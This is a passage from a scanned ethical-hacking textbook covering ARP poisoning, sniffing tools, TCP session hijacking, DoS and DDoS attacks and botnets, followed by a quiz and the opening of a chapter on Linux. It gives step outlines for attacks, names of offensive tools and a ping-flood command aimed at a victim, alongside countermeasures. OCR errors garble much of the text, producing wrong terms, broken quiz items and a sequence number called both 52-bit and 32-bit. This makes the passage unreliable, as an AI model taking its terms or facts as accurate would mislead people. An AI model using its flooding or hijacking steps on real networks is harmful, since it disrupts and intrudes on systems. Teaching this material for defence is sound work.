redirect traffic to another system such as the attacker’s. refer to Chapter 2 and the discussion on ARP and the OSI reference model. • ARP poisoning can be used to intercept and redirect traffic between two systems on the network. • MAC Hooding can clog and overwhelm a switch’s CAM, forcing it into what is known as forwarding mode. Router !P:1 0.0.0.1 ft/I AC: cc:cc:cc:cc:cc:cc Modified ARP cache point IP: 10.0.0.10 to ee:ee:ee:ee:ee:ee: ARP poisoning in practice. (Link’s MAC) Regular Network Route Zelda IP’ 10.0.0.10 to aa:aa:aa:aa:aa:aa Modified ARP cache point IP: 10.0.0,1 1o ee:ee:ee:ee:ee:ee {Link : s MAC) IP: 10.0.0.3 to ee:ee:ee:ee:ee:ee Ganon CHAPTER 12 Sniffers, Session Hijacking, and Denial of Service Attacks 283 With knowledge of the A IIP process in hand, it is very easy to understand the mechanics of ARP poisoning or ARP spoofing. ARP poisoning works by sending out bogus ARP requests to tiny requesting device and I he switch. The idea is to force traffic to a location other than the intended target and therefore sniff what is being sent and received. When the bogus requests Eire sent out> the switch stores them. Other clients will then automatically send traffic to the new target, as they will check their cache first where the bogus entry has been stored. Figure 12-1 illustrates ARP poisoning in practice, Here are the steps in the process: NOTE Not forwarding traffic on to the original destination would arouse suspicion that would tip off the network administrator to the attacker’s presence. 1. Attackers send out a broadcast stating that a given IP address (such as a router or gateway) maps to their own MAC address, • A victim on the network initiates i\ com mimical ion that requires exiting the network or subnet. • When the traffic is transmitted, the A IIP mapping shows that the router’s IP address maps to a specific MAC address, so traffic is forwarded to the attacker instead. • To complete the sequence and avoid arousing suspicion, the attacker forwards traffic to the real destination (in this case, the router). • Here are some points to remember about ARP poisoning: • Anyo ne can downlo ad malicious so ft w a re u sed to run ARP spoo fing a tta cks from the Internet. • Attackers can use bogus ARP messages to redirect traffic. • It is possible to run DoS attacks with this technique. • It can be used to intercept and read data, • It can be used to intercept credentials such as usernames n nd passwords, • It can be used to alter data in transmission. • It can be used to tap voice over TP {VoIP) phone calls, Several utilities in your security professional toolbox are specifically designed to carry out ARP spoofing, no matter what your OS of choice may be. The following list details some of the options available to you: • Arpspoof — Designed to redirect traffic in the form of packets from a victim’s system. Performs redirection by forging ARP replies. This utility is part of the popular Dsn iff suite of utilities. • Cain — The “Swiss army knife 1 ‘ of tools; can perform ARP poisoning, enumeration of Windows systems, sniffing, and password cracking ■ E tte rca p — An old but very c a pab le p ro toco I a n a lyzer th a t c ei n per form A R 1 y poisoning, passive sniffing, protocol decoding > and as a packet capture • Internal Revenue Service (IRS) — Not a port scanner; it is a ” valid source IP address 1 ” scanner for a given service. Combines ARP poisoning and halt-scan processes and attempts TCP connections to a specific victim. 284 PART 2 A Technics I Overview of Hacking ARP Works — Utility for creating customized packets over the network that perform the ARP announce feature • Nemesis — Can perform some ARP spoofing Sniffing Tools Several very capable sniffing tools are available* including the popular ones in the following list: Wireshark — One of the most widely known and used packet sniffers. Offers a tremendous number of features designed to assist in the dissection and analysis of traffic. Wireshark is the successor to the Etheral packet sniffer. • Tcpdump — A well-known command line packet analyzer. Provides the ability to intercept and observe TCP/IP and other packets during transmission over the network. • Win dump — A port of the popular Linux packet sniffer known as TCPdump. which is a command line tool that is great for displaying header information. TCPdump Ls available at http://www.tcpduitip.org. • Omni peek — Manufactured by Wildp tickets, Omni peek is a commercial product 1 1 1 l i L Js t he ‘villi id n 0 1 iJie product Ia luTpuuk, • Dsn iff — A suite of tools designed to perform sniffing with different protocols with the intent of intercepting and revealing passwords. Dsn iff is designed for UNIX and Linux platforms and does not have a complete equivalent on the Windows platform. • Ether ape — A Linux/UNIX tool that is designed to graphically display the connections incoming and outgoing from a system • MSN Sniffer — A sniffing utility specifically designed for sniffing traffic generated by the MSN messenger application Netwitness Next gen — A hardware-based sniffer, plus other features, designed to monitor and analyze all traffic on a network; a popular tool in use by the FBI and other law enforcement agencies Not all traffic needs to be protected, and rt may not even be feasible to do so. Remember that all extra countermeasures that are deployed are extra devices and processes to support and are extra overhead on the network. CHAPTER 12 Sniffers, Session Hijacking, and Denial of Service Attacks 285 To defeat sniffing, a number of countermeasures can be employed, including the following: • Encryption — Protecting tradie from being sniffed can be as simple as making it undecipherable to those not having the key. Encrypting select data through the use of technologies such as IPSec. SSL, virtual private networks (VPNs). and other related techniques can be a simple but effective way of thwarting sniffing. The downside here is that the process of encryption costs in processor power and performance. • Static ARP entries — Configuring a device with the MAC addresses of the devices that may use it can block a number of attacks, but can be difficult to m anage. ■ Port security — Switches have the ability to be programmed to allow only specific MAC addresses to send and receive data on each port. W h en c ons i d er in g ne twork sec u r tty a n d t h iv a r t i n g the powe r o f s n i if 5 n g . yo u s h o u Id consider which protective measures are appropriate and which are not. In the case of encryption, for example, not all traffic needs to be encrypted because not all network traffic is of a sensitive nature. Always consider the exact nature of the traffic, too. Remember, just because you can do something does not mean you should. Session Hijacking The next type of attack that can be used to alter and interrupt communications on a network is the technique known as session hijacking, Hijacking a session falls under the category of active attacks in that you must directly and somewhat aggressively interact with the network and the victims on it. Hijacking builds on the techniques discussed in our previous section of sniffing and raises the stakes by taking over the communication between two parties. Once attackers decide to undertake a session hijacking, they will be actively injecting packets into the network with the goal of disrupting and taking over an existing session on the network. Ultimately the session hijack will attempt to take over a session that is already authenticated to a resource to be attacked. Here’s a high-level view of what session hijacking looks like: 1. Insert yourself between Party A and Party Ik • Monitor the flow of packets using sniffing techniques. • Analyze and predict the sequence number of the packets. • Sever the connection between the two parties. • Seize control of the session. • Perform packet injection into the network. • 286 PART 2 A Technical Overview of Hacking To SEmmariae, session hijacking is the process of to king over an already established session between two parties, Some points to remember about session hijacking: • TCP session hijacking is in process when an attacker seizes eontroi of an existing TCP session between two systems. • Session hijacking takes place after the authentication process that occurs at the beginning of a session. Once this process has been undertaken, the session can be hijacked, and access to the authenticated resources can take place, • Session hijacking relies on a basic understanding of how messages and their associated packets flow over the Internet, • Session hijacking, much like sniffing, has two forms: active and passive* Each form of session hijacking has its advantages and disadvantages that make it an attractive option to the attacker. Let’s compare and contrast the two to see what they offer an attacker. • Active session hijacking — Active attacks are effective and useful to the attacker because they allow the attacker to search for and take over a session at will. In active session hijacking, the attacker will search for and take over a session and then interact with the remaining party as if the attacker were the party that has been disconnected. The attacker assumes the roie of the party he has displaced, in other words. • Passive session hijacking — Passive attacks are different in that the attacker locates and hijacks a session of interest, but does not interact with the remaining party. Instead, in passive session hijacking, attackers switch to an observation type mode where they record and analyze the traffic as it moves. Passive hijacking is functionally no different from sniffing. Identifying an Active Session Earlier, when sniffing was discussed, the process was that of observing traffic on the network. Session hijacking builds on this process and refines it. Session hijacking adds the goal of not only observing the traffic and sessions currently active on the network but also taking over one of these sessions that has authenticated access to the resource you want to interact with. For a session hijack Lo be successful, the aUacker must locate and identify a suitable session for hijacking. It sounds like a simple process until factors such as different network segments, switches, and encryption come into play. If you factor in the very real issue of having to uncover sequence numbers on packets in order to properly take control of a session, the challenges mount signifi- cantly. But they are not insurmountable. Remember that while the challenges are not small, what is on the line is the ability to interact with and execute commands against authenticated resources. NOTE Session hijacking builds on the techniques and lessons learned in passive and active sniffing so you may want to review those lessons again if you are not completely clear on them. Session hijacking takes sniffing and moves these lessons to the next Eevei where you move from listening to interacting, which is more aggressive by nature. * CHAPTER 12 Sniffers, Session Hijacking, and Denial of Service Attacks 287 Consider some of the challenges standing in the way of successful session hijacking: • Sequence numbers — Every packet has a unique 52-bit number embedded into il s li^cidi 1 )” Lhal i den lilies it and how i1 should be reassembled with Us fellow packets to regenerate the original message. • Network segments — When the attacker and victims are on the same network segment or on a network that uses a hub, observing traffic works like basic sniffing. However if the victim and the attacker are on two different network segments separated by a switch, it becomes more difficult to carry out an attack, and techniques akin to the active sniffing techniques are needed. Take a look at the sequence number problem. Let’s review the steps involved in session hijacking once again: 1. Insert yourself between Party A and Party B. • Monitor the flow of packets using sniffing techniques. • Analyze and predict the sequence number of the packets. • Sever the connection between the two parties. • Seize control of the session. • Perform packet injection into the network. • Look at Step 1 — this step is easy on a network on which you can see both parties. On these types of networks you can sniff the traffic passively and read the sequence numbers off of the packets themselves. On a switched network, it becomes much more of an issue because you cannot see the other party(ies) so you must use techniques to guess the sequence number correctly (you can’t just stumble in with whatever number you want). In this situation > you will send several packets to the victim or target in order to solicit a response with the sequence numbers on it. Sequence numbers are a cornerstone of TCP that makes a number of features that you may take for granted possible. In TCP every piece or byte of data must have a sequence number assigned to it to track the data, assemble it with its fellow packets, and perform flow control. So where and when do the sequence numbers get assigned? During the three-way handshake, which is illustrated in Figure 12-2. NOTE In the past, some operating systems did allow for the methodical and mathematical creation of sequence numbers. This was possible because these operating systems implemented very predictable sets of sequence numbers. Most operating systems now avoid this by randomly generating sequence numbers as a security measure. 1 FY I Some facts about sequence numbers: Sequence numbers are a 32-bit counter. The possible combinations can be more than 4 billion. • Sequence numbers are used to tell the receiving machine what order the packets should go in when they are received. An attacker must successfully guess the sequence numbers in Order to hijack a session, 288 PART 2 A Technical Overview of Hacking FIGURE 12-2 Three-way handshake. SYN SYN-ACK ACK i 1 [[ere are some points to bear in mind about sequence number prediction: • When a client transmits a SYN packet to a server the response will be a SYN-ACK. This SYN-ACK wilt be responded to with an ACK. • During this handshake, the starting sequence number will be assigned using a random method if the operating system supports this function. • If this sequence number is predictable, the attacker will initiate the connection to the server with a legitimate address and then open up a second connect from a forged address. • Once an attacker has determined the correct sequence numbers, the next move is to inject packets into the network. Of course, this is easier said than done, and just injecting packets into the network is not useful! in every case because a few details must be in place first. Consider the two extremes of the session: the beginning and the end. At the beginning of the session, the process of authenti- cation takes place, and injecting packets into the network and taking over the session here would be worthless if done prior to the authentication process (after all, you want an authenticated session). On the other hand, injecting packets too late, such as when the session is getting torn down or closed, will mean that the session you want to hijack is no longer present. With the proper sequence numbers predicted and known the attack can move to the next phase which is to unplug one of the parties, such as a server if one is present. The goal at this stage is to knock out or remove one of the parties from the commu- nication in order to get them out of the way. The removal can be performed by any method the attacker chooses, from a simple DoS to sending a connection reset request to the victim. NOTE You must wait for authentication to take place prior to taking over a session because without doing so you don’t have trust, and in this case the system you are trying to interact with has no knowledge of you. Seizing Control of a Session At this point, the attacker now has control of a session and can move toward carrying out dirty work, whatever it may be. The trick for the attacker u- keep the session maintained and active because as long as this connection is maintained and kept alive, the attacker has an authenticated connection to their intended target. CHAPTER 12 Sniffers, Session Hijacking, and Denial of Service Attacks 289 Session Hijacking Tools ]n order to perform session hijacking you can use a number of different tools, each having its own advantages and disadvantages. Each of the tools on this list has seen widespread use by hackers and will offer you the ability to perform session hijacking quite easily. Each of these tooi.s is essentially a packet sniffer with the enhanced capability needed to perform session hijacking. » Ettercap — An old-school tool that has the advantage of being muitiplatl’orm so you can learn how to use it on one platform and move those skills over easily to another platform such as Mac OS X, Ettercap possesses robust capabilities that enable it to perform its duties quite well. Included in this functionality is the ability to perform man-in-the-middle attacks, ART spooling, and session hijacking. • Hunt — This is a commonly used tool for performing session hijacking: in fact, it Is the first one most hackers and security professionals are introduced to. This software has the ability to observe and hijack a session between two parties, and also has the ability to fire off TCP resets to shut down a victim system. This software package is designed to work on Ethernet-based networks and can work in both passive and active modes. • IP Watcher — This utility is a commercial-grade tool ( read: you have to pay for it) that can perform session hijacking and monitor connections so you can choose the session you wish to take over. • T-Sight — Another commercial offering that can hijack TCP sessions on a network much like IP wale her • Remote TCP Reset — Is designed to find and reset an existing TCP connection Thwarting Session Hijacking Attacks Session hijacking is dangerous. But you can limit its impact to a great degree through the proper application of your two best lines of defense: being proactive and looking for the signs of an attack. One of your tools for this is something you read about earlier encryption. After all it is hard for troublemakers to hijack a session if they can’t see what is being transmitted. Other measures you can use include configuring routers to block spoofed traffic from outside the protected network. Additionally, you can use counter- measures such as an intrusion detection system (IDS) that can watch for suspicious activity and alert you to it, or even actively block this traffic automatically. Denial of Service (DoS) Attacks An older type of attack that still pJ agues the Internet and the computer systems attached to it is the DoS, which is a threat against one of the core tenets of security: availability. This makes sense when you consider that a DoS is designed to target a service or resource, and deny access to it by legitimate users. In this section, you will take a look at this simple form of hacking: what it can do as well as how it works. 290 PART 2 A Technical Overview of Hacking NOTE DoS attacks are commonly used by those who fall in the category of script kiddies due to the relative simplicity of the attack. DorTt be lulled into a false sense of security, however, as more advanced hackers have been known to use this attack as a ; asL resort (as a way of shutting down a service that they were unable to get access to). MOTE The use of DoS to extort money has increased over the past few years as criminals have become more adept at using technology. A DoS functions by tying up valuable resources that coutd be used to service legitimate needs and users, In essence, a DoS functions like this: Imagine someone calling your cell phone over Eind over again; at some point they call often enough that no one else could call you nor could you call out. At that point you would become the victim of a DoS. Translate this scenario into the world of computer networks, and you have a situation where availability of a service is similarly threatened. DoS attacks used Lo be used to annoy and irritate a victim, but over the past few years these attacks have evolved into something much more ominous: a means to extort money and commit other crimes. For example, a criminal may contact a victim and ask for protection money to prevent any unfortunate ‘”accidents” from happening. To summarize, the main points of a DoS action are to: • Deny the use of a system or service through the systematic overloading of its resources. An attacker is seeking a result in w r hich the system becomes unslEihle. substantially? slower, or overwhelmed to the point it cannot process any more requests. • Be carried out when an attacker fails at other attempts to access the system and just decides to shut down a system in retaliation Categories of DoS Attacks DoS attacks are not all the same. They can be broken down into three broad categories based on how they carry out their goal of denying the service to legitimate uses and users: • Consumption of bandwidth • Cons umption of re source s Exploitation of programming defects • Consumption of Bandwidth Bandwidth exhaustion is one of the more common attacks to be observed in the wild. This type of attack is in effect when the network bandwidth flowing to and from a machine is consumed to the point of exhaustion. It may seem to some that the solution here would be to add enough bandwidth that it cannot be easily exhausted, but the keyword is “easily 1 ‘ exhausted — it does not matter how much bandwidth is allocated to a system; it is still a finite amount. In fact, an attacker does not have to completely exhaust bandwidth to and from a system, but rather use up so much of it that perfor- mance becomes unacceptable to users. So the attacker’s goal is to consume enough bandwidth to make the service unusable. CHAPTER 12 Sniffers, Session Hijacking, and Denial of Service Attacks Some well-known forms of attacks in this category include: • Smurf — Through the exploitation of the Internet Control Message Protocol (ICMP) and spoofed packets to the broadcast address of a network, the attacker can generate a torrent of traffic from the sheer number of systems that may reply. ■ Fraggle — This type of attack is similar to the smurf attack with the difference being what it uses to consume bandwidth. In the case of fraggle attacks, bandwidth is consumed through the use of Oser Datagram Protocol (UDP) p tickets instead. • Charger) — This protocol was originally designed for testing and evaluation purposes, but it can be used to perform a DoS by generating traffic rapidly. By doing so. char gen can consume the ba nd width on a network rapidly, at which point a DoS will have occurred. Consumption of Resources Much like bandwidth consumption, the goal of resource consumption-based attacks is to eat up a limited resource. However, unlike bandwidth consumption, the goal is not shared among multiple systems; instead it is targeting the resources on a single system. When an attack of this nature is carried out. a service or an entire system may become overloaded to the point where it slows, locks, or crashes. This type of attack can vary in how it is approached; the following list is some of the more common forms of this attack: • SYN flood — This type of attack uses forged packets with the SYN flag set. When the victim receives enough of the packets, the result is an overwhelmed system as the SYN flood consumes connection resources to the point where no resources are available f o r leg i 1 i m a Le connections. ICMP “flood — This type of attack comes in two variants; smurf attack and ping flood. • Smurf attack — Carried out when a large amount of traffic is directed to the broadcast address of a network instead of to a specific system. By sending traffic to a broadcast address of a network, the request is sent to all hosts on the network, which respond in turn. However, because the attacker will take the extra step of configuring the packet with the intended victim as the source, all the hosts on the network will respond to the victim instead of to the attack. The result is that a flood of traffic overwhelms the victim causing a DoS. ■ Ping flood — Carried out by sending a large amount of ping p tickets to the victim with the intent of overwhelming the victim. This attack is incredibly simple, requiring only basic knowledge of the ping command* the victim’s IP, and more bandwidth than the victim. In Windows, the command to pull off such an attack would be: ping -t victim IP ado\ress> • Teardrop attack — In this type of attack, the attacker manipulates IP packet fragments in such a way that when reassembled by the victim + a crash occurs. This process involves having fragments reassembled in illegal ways or having fragments reassembled into larger packets than the victim can process. 292 PART 2 A Technical Overview of Hacking • Reflected attack — This type of at I tick is carried oul by spooling or forging the source address of packets or requests and sending them to numerous systems, which in turn respond to the requesl .This type of attack is a scaled- up version of what happens in the ping flood attack. Exploitation of Programming Defects Consuming bandwidth isn’t the only way to carry out a DoS attack on a system. A jiolhi-r is lo exploit kmnvti weaknesses in the system’s design. Vulnerabilities ot 1 1ns type may have been exposed due to Haws in the system’s design that were inadvertently put in place by the programmers or developers of the system. The following list has some of the more common methods of exploiting programming defects: Ping of death (PoD) -This type of attack preys upon the inability of some systems to handle oversized packets. An attacker sends them out in fragments; when these fragments reach the system they are reEissembled by the victim, and when the “magic size” of the 6 5,5 36 bytes allowed by the TP protocol is reached, some systems will crash or become victim to a buffer overflow. • Teardrop — This attack succeeds by exploiting a different weakness in the way packets are processed by a system. In this type of attack, the packets are sent in a malformed state with their offset values adjusted so they overlap, which is illegal. When a system that does not know how to deal with this issue is targeted, a crash or lock may result. • Land — In this type of attack, a packet is sent to a victim system with the same source and destination address and port. The result of this action is that systems that do not know how to process this crash or lock up. • ^ NOTE All these attacks have been around for years and so you would expect systems to be designed to be less susceptible to them. However, this is not the case. It has been discovered time and time again that modern systems from all vendors can be vulnerable to these attacks if they are not patched and managed correctly. ^ NOTE Some of these tools have been known to appear on systems seemingly inexplicably, which may be a sign of a system that has become part of a botnet. which will be discussed later in this chapter. Tools for DoS There are pJenty of tools available to the hacker to perform a DoS attack, including: • Jolf2 — A piece of software designed to flood a system with incorrectly formatted p tickets • Targa — This software is designed to attempt different types of attacks and has eight different variations to choose from. Crazy Pi tiger — This software is designed to send ping packets of varying sizes and other parameters to a victim. CHAPTER 12 Sniffers, Session Hijacking, and Denial of Service Attacks 293 FYI Do not be confused — DoS and DDoS attacks are as similar as they are indeed different. The two share some traits, but vary in others. The two attacks both seek to overwhelm a victim with requests designed to lock up r slow down, or crash a system. The difference is in implementation as DoS is generally one system attacking another, and DDoS is many systems attacking another. It could be said the difference is scale. hackers keep developing new me I hods of carrying them out. Some Characteristics of DDoS Attacks As you can readily imagine, a distributed attack , involving many compromised machines, is a more devastatingly effective way to commit a denial of service attack than simply using one machine to attack another. Here are some specifics you should know: • Attacks of this type are characterized by being very large, using hundreds or thousands of systems to conduct the attack. • DDoS has two types of victims; namely, primary and secondary. The former is the recipient of the actual attack; the latter tire the systems used to launch the attack itself, • The attack can he very difficult if not impossible to track back to its true source because of the sheer number of systems involved. • Defense is extremely difficult due to the number of attackers, Configuring a router or firewall to block a small number of single IP addresses is child’s play. Larger numbers of attackers are nearly impossible to block, • Impact of this attack is increased over standard DoS because many hosts are involved in the attack, multiplying the attack’s strength and power, • A DDoS is an “upgraded” and advanced version of the DoS. The DDoS has the same goal as the DoS, which is to shut a system down by consuming resources, but does so through sheer force of numbers. This type of attack generally tends to occur in two waves designed to position and carry out the attack. In the first wave, the attack is staged, and the targets that will be the “foot soldiers” are infected with the implements that will be used to attack the final victim. Targets for infection in this phase include systems that have high-speed connections, poorly defended home and business networks, and poorly patched systems. What is infecting these systems can and will vary* but it could include software such as the ones mentioned previously for a traditional DoS. A distributed denial of service I DDoS] attack is a powerful tool for those who know how r to use it. Security professionals have developed techniques to prevent these attacks, hut Distributed Denial of Service (DDoS) Attacks 294 P A RT 2 A Tech nical Overview of H ack i n§ Wave 2 is the attack itself. Foot soldiers form the army of systems that will collectively attack a designated target. These infected systems can number in the thousands, hundreds of The infected systems are not always referred to as “zombies”; they are sometimes called “hots” (short for robots) or. like Lhe Borg in S:ar Trek, “drones.” Whatever you call them, the goal is the same; to target a system and steamrolt it with traffic. thousands, or even millions awaiting the instruction that will turn their collective attention toward a target (these infected systems are called “zombies* }, These are the steps of the attack itself: • Construct a piece of malware that will transmit packets to a target net work/ Web site. • Convert a predefined number of computers to drones, • Initiate the attack by sending signals to the drones • to attack a specific target • Have drones initiate an attack against a target until they are shut down or disinfected. A DDoS attack like this sounds simple, but in practice it is not, because it takes quite a bit of planning and knowledge to set up, not to mention a good amount of patience. To set this type of attack up, two components are needed: a software component and a hardware component. On the software side, two items are needed to make the attack happen: » Client-side software — This is the software that ultimately will be used to send command and control requests to launch an attack against the target. This software will be used by the attacker to initiate the opening stages of the attack, • Daemon software — This software is resident on the infected systems or hots. This software is installed on a victim and then waits for instructions to be received. If you have software of this type installed, you are the one actually attacking a system. The second requirement that is essential is the hardwiu u: moR 1 specifically, these are the systems that will be components of the attack: • Master or control system — The system responsible for sending out the initial messages to start the attack: also the system that has the client software present and installed Zombie — The system that is the one carrying out the attack against the victim. The number of zombies can vary wildly in number. • Target — The system that is the actual victim or recipient of the attack You may be wondering whether, all things considered, a DDoS is unstoppable, DDoS attacks rely on locating and using vulnerable hosts that are connected to the Internet. These systems are then targeted for these known vulnerabilities and taken over. Once the attack is initiated and the command sent out to the attackers, the DDoS is nearly impossible to stop. CHAPTER 12 Sniffers, Session Hijacking, and Denial of Service Attacks 295 Routers and lire walls may be configured to block the attack, but the attack can overwhelm these devices and shut down the connection anyway. The sheer volume of attackers involved to DDoS attacks makes them difficult to stop. Tools for DDoS To initiate a DDoS requires the proper tools, and there are a number available. The tool or tools you use will ultimately depend on what your preferences are as well as other factors such as platform, but the following list is a sampling of these tools: • Tribal Flood Network (TFN)— TFN can launch ICMP, Smurf, T1DP, and SYN tlood attacks at will against an unsuspecting victim. TFN has the distinction of being the first publicly available DDoS tool. • Trinoo — Trinoo can claim to be the first widely used DDoS application largely because it is easy to use and has the ability to command and control many systems to launch an attack. • Stacheldraht — The best of both worlds is available in this tooL which offers features that are seen both in Trinoo and TFN. Stacheldraht uses TCP and ICMP to send commands and control its agents in order to attack. This software also includes what could be considered advanced features in the form of encrypted communication from client to handlers,, • TFN2K — An upgrade to TVN, it provides some more advanced features including spoofing of packets and port configuration options. As opposed to TFN, this software does include encryption features, but not as strong as those of Stacheldraht. • WinTrinoo — This software is a Windows port of Trinoo and has the Eibility to use Windows clients as drones. • Shaft — This works much the same way els Trinoo. but includes the ability for the client to configure the size of the flooding packets and the duration of attack. • M Stream — This utilizes spooled TCP pEickets to attack a designated victim, • Trinity — This performs several DDoS functions, including fraggle, fragment, SYN, RST, ACK, and others. • Botnets An advanced type of attack mechanism is a bo met. which consists of systems that are infected with software such as those used in DDoS attacks. When enough of these systems are infected, and a critical mass hms been reached, it is possible to use these machines to do tremendous damage to a victim. Botnets can stretch from one side of the globe to another and be used to attack a system or carry out a number of other tasks. 296 PART 2 A Technical Overview of Hacking Botnets can perform several attacks, including: NOTE Remember that a botnet can easily number tnto the hundreds of thousands or millions of systems, stretching from one end of the globe to another. With these kinds of numbers, the attacks noted here take on a new meaning and destructive capability. DDoS — This construct makes sense as tin attack method based on the way a DDoS works and Lhe number of systems thai can be infected. Sending — Botnets have been used Lo transmit spam and other bogus information on behciif of their owner. • Stealing information — Attacks have also been carried out with botnets to steal information from unsuspecting users’ systems, • Clickfraud — This attack is where the attacker infects a large numb er o f sy s t em s w ilh L b e i d e a t h a 1 1 hey w i 1 1 u se t he i n tec t e d systems lo click on ads on their behalf, generating revenue for themselves. A “bot s is a type of malware that allows an attacker to take control over an affected computer. Also known as “‘Web robots,” bots are usually part of a network of infected machines known as a ” botnet, 1 ” which is typically made up of victim machines that stretch across the globe. FY! > The following is a dipping from an FBI news briefing: … the Department of Justice and FBI announced the results of an ongoing cyber crime initiative to disrupt and dismantle “bot- herders” and elevate the public’s cybersecurity awareness of botnets. OPERATION BOT ROAST is a national initiative. Ongoing investigations have identified over 1 million victim computer IP addresses/’ http://www.fbi. gov/pressfel/ pr9ssrei07/botnet06 1307.htm CHAPTER 12 Sniffers, Session Hijacking, and Denial of Service Attacks 297 cm CHAPTER SUMMARY This chapter focused on three types of network attacks: sniffing session hijacking, and DoS attacks. Each of these attacks represents a powerful weapon in the hands ul” li skilled attacker. Sniffing is the process of capturing and analysing traffic In an effort to observe in lor mat ion that is confidential. Sniffing can be performed on just about any network, but the technique may require that you adapt based on how the network operates. In networks with a hub, you can easily sniff using any packet sniffer and starting the process. On networks that use switches, however, it is different lis the switch prevents you from seeing what is on a different collision domain. On networks where switching is used, you will have to use techniques such as MAC Hooding and ARP spooling to bypass the switch prior to snilling. Moving beyond or building upon the techniques thai were introduced in sniffing is the session hijack, which is an aggressive and powerful weapon in the hacker’s arsenal, A session hijack takes over an existing authenticated session and uses it to monitor or manipulate the traffic, and even execute commands on a system remotely. Session hijacking in its most advanced stages directly affects and attacks the integrity of information in an organisation. An attacker using this technique can modify information at will as they have the credentials of the victim and whatever the victim has access to. DoS attacks were discussed and you learned how these attacks are used to shut down and deny legitimate access to and usage of services to users. A DoS is used to target a service or system and prevent if from being used for legitimate uses for as long as the attacker wishes, tinder the right conditions, a DoS directly attacks the eonlidentiality and integrity of data that users have been granted the right to use. KEY CONCEPTS AND TERMS Active session hijacking Content addressable memory Passive sniffing Active sniffing {CAM) Promiscuous mod Address Resolution Protocol Fail-open Session hijacking {ARP} poisoning Hub Switch Botnet Lookup table Collision domain Passive session hijacking 298 PART 2 A Technical Overview of Hacking CHAPTER 12 ASSESSMENT 1 . A DoS Is in canl to deny a service from legitimate usage. A, True II False 1. Sniffers can be used to: A. Decrypt information E, Capture Information C. Hijack communications D, Security enforcement 1. Session hijacking is used to c Lip Lure ci-ljJUc. A, Trnc B, False 1. Session hijacking is used to take over an authenticated session A, True K False 1. Active smiling is used when switches are present. A. True IS, False 7. is used to overwhelm a service. is used to flood a switch with bogus MAC addresses. is used to fake a MAC address. A. Spoofing Flooding C. Poisoning IX 11 ij Lie king 1. What type of device can have Its memory filled up when MAC flooding is used? A. Hub li. Switch C. Router D. ti ate way 1. What technique is used when traffic Is captured on a network with hubs? A. Active sniffing 15. Fassn u –jiilj’iiL C. MAC Flooding ll Killer flooding Linux, Live CDs, and Automated Assessment Tools CHAPTER N TODAY’S BUSINESS ENVIRONMENT, it is likely that you will encounter operating systems other than the familiar Windows desktop. While Windows still lays I claim to a large segment of the computers in the world, it is not the only operating system out there: Operating systems (OSs) such as the Mac OS, UNIX, and Linux are likely to cross your path at some point. As a security professional, it is important for you always to have an understanding of the tools available to you, and in the security field this requires some knowledge of the Linux OS. Linux is different from Windows and will require some effort from you to learn, but once It is learned you will have many more tools available to you through which you can assess the security of your organization. Linux offers a tremendous number o f bene'” ts (the least of which is that it is Tea; most important is the amount of tools that will become available to you). Linux offers benefits that Windows just cannot offer such as Live CDs. Linux is one of the very few OSs that can be run off of removable media such as flash drives, CDs, DVDs r and portable hard drives. Linux can be booted off removable media without being installed on a hard drive or on a computer, eliminating the need to make changes to the computer itself, f Chapter 13 Topics This chapter covers the following topics and concepts: What Linux is ■■■ What users, groups, and special accounts are ■ What working with permissions in Linux is • What commonly used commands are What ipchains and iptables are What Live CDs are • What automated assessment tools are 299 Chapter 13 Goals When you complete this chapter, you will be able to. • List the features of Linux • Discuss the benefits of Linux • Describe the benefits of Live CDs • Describe the benefits of automated assessment tools • Describe the types of automated assessment tools • NOTE Linux was originally designed and created by Linus Ton/aids in 1991 with the help of program mers and developers around the world. Since 1991, the operating system has rapidly evolved from a computer science project to a very usable mainstream operating system. Linux This chapter moves away from Windows to discuss Linux, which has a great deal in common with an older operating system — UNIX. Linux offers many of the benefits you would expect in any modern operating system, but a little differently from what you may be used to. The first difference is that it is open source, meaning that anyone can browse the source code. This design offers a degree of transparency that is not observed in other operating systems that are closed source, such as Windows, FIGURE 13-1 Linux KDE Desktop. 300 CHAPTER 13 Linux, Live CDs, and Automated Assessment Tools 301 Do not Confuse free and open source because the two terms are not interchangeable. Free means just that — no charge. Vendors can choose to charge for their version of Linux if they so choose; however, this charge usually means that they are charging for support instead of for the product itself. A good example of this is SUSE and OpenSUSE: OpenSUSL is a free version, and SUSE is Novell’s fee-based version. Open source means that the source code is available for perusal by anyone. By the terms of the GPL r anyone who makes available their own version of Linux through customization or other means must also make available the source code for public review. While Linux is a largely free and open source operating system, it is still powerful and useful. Linux is in fact ei very complete operating system that offers graphical user interfaces (GUIs) that are easy to use and work with. Linux has also shown the ability to be very flexible and portable, running on ei wide range of hardware and devices all offering similar or exactly the same features and capabilities. Figure 13-1 shows one possible interface for Linux. Linux is available in many different variations, known as distributions, available from many different vendors. These distributions vary in style, fenunvs. perlunmiLKV am.! usage \v\lh some bein^ pur pose fully built for a spec Hie situation. A common misconception is that Linux is always free. In fact it is not always; some distributions do have an associated fee to purchase them much like Windows. However* they still make their source code available with the General Public License (GPL). Some of the more common distributions of Linux include: • L’buntu • Kubuntu • OpenSuSE • Fedora • Debian • Slack ware • MEFIS • At the heart of every operating system is the kernel, which is its core component. It has control over all the low -level system functions such as resource management, input and output operation s F and the central processing unit (CPU). The kernel can be said to dictate the very behavior of the operating system itself In most cases. MOTE Linux offers several different graphical: interfaces including KDE, Gnome, Fluxbox, and Lightbox. Conversely, Linux also can be entirely command line based with no corresponding GUI. NOTE Currently there are more than 2 r 000 distributions of Linux available in different forms and formats. While most of these distributions are very specialized, it does demonstrate the large number of distributions available and the overall flexibility of the operating system. 302 PART 2 A Technical Overview of Hacking NOTE There are many different shells ava ilable for the Linux platform. It is up to you to choose what is best suited and most comfortable you will not be interacting wiLh the kernel directly; you will be interacting with it only through the use of a shelL which is the interface that is either command line- or graph ical-based. The shell also interacts with devices such as hard drives, ports, central processing unit (CPU), Eind other types of devices. for you. Examples of shells that are in u&e are Bash H csh, and tcsh Others are available in Linux Each of these kernels is built for the specific environ- ment and operating system. In the case of Linux, there are multiple versions that are in use across different distributions that in some cases are customized. This also shows one of the unique features of Linux and the Linux kernel, Linux, unlike Windows, can have its kernel configured by anyone wishing to take the time distributions as well. The choice is yours about wbkh is preferable, and any can generally be used with little or no loss in functionality. (and having the knowledge) to do so. A Look at the Interface Linux can be used in two different ways — through the command line or through a GUI. In the Windows world, bolh options are available as well, but most people use the GUI and never think about the command line. In the Linux world, it is not uncommon for users to use both; in fact some advanced or hard -core users don’t use the GUI al alL opting to use the command line Instead. One of the biggest misconceptions about Linux is that you can only use the command line to operate it. While it is true that the command line may indeed be the only way to do more 